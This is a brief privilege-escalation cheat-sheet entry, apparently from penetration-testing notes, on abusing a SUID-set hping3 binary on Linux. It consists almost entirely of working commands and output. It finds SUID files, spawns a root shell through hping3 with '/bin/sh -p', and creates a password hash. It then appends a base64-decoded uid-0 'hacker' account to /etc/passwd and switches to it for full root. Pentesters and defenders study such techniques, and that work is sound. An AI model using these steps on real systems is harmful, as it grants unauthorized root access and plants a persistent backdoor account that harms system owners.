Hping3
$ find / -type f -perm -u=s 2>/dev/null
/usr/sbin/hping3
β
$ /usr/sbin/hping3
hping3> /bin/sh -p
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)# Create a hash
$ openssl passwd -1 -salt hacker pass123
$1$hacker$zVnrpoW2JQO5YUrLmAs.o1
β
# Launch a hping3 shell
$ /usr/sbin/hping3
# Base-64 encode the payload
$ echo 'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0::/root:/bin/bash' | base64
aGF...<SNIP>...oCg==
β
hping3> echo "aGF...<SNIP>...oCg==" | base64 -d >> /etc/passwd
β
hping3> su hacker
Password: pass123
# id
uid=0(root) gid=0(root) groups=0(root)Last updated